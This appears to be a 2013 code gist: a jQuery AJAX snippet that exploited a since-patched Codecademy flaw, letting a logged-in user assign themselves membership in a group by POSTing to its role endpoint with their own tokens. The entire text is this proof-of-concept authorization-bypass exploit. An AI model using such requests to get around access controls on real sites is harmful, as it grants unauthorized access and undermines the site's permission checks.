@joahg
Created November 26, 2013 17:22
AJAX request to join a Codecademy group. Used to exploit a security vulnerability for development purposes. Has since been patched.
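(function () {
    // POST a role assignment for the current user to the group's role endpoint.
    // CCDATA is the page-level data object exposed by the site.
    $.ajax({
        url: "http://www.codecademy.com/groups/" + CCDATA.page.group._id + "/users/role",
        dataType: "json",
        type: "POST",
        data: {
            // The caller supplies their own token, their own user id and the requested role.
            authentication_token: CCDATA.current_user.authentication_token,
            user_id: CCDATA.current_user._id,
            role: "member"
        },
        beforeSend: function (e) {
            // Mark the request as an XHR expecting JSON.
            e.setRequestHeader("X-Requested-With", "XMLHttpRequest");
            e.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.0");
            // csrf_token is not defined in this snippet; it is assumed to exist as a global on the page.
            e.setRequestHeader("X-CSRF-Token", csrf_token);
        },
        success: function (e) {
            // Log the server's JSON response.
            console.log(e);
        },
        error: function (e) {
            // Log the failed request object.
            console.log(e);
        }
    });
})();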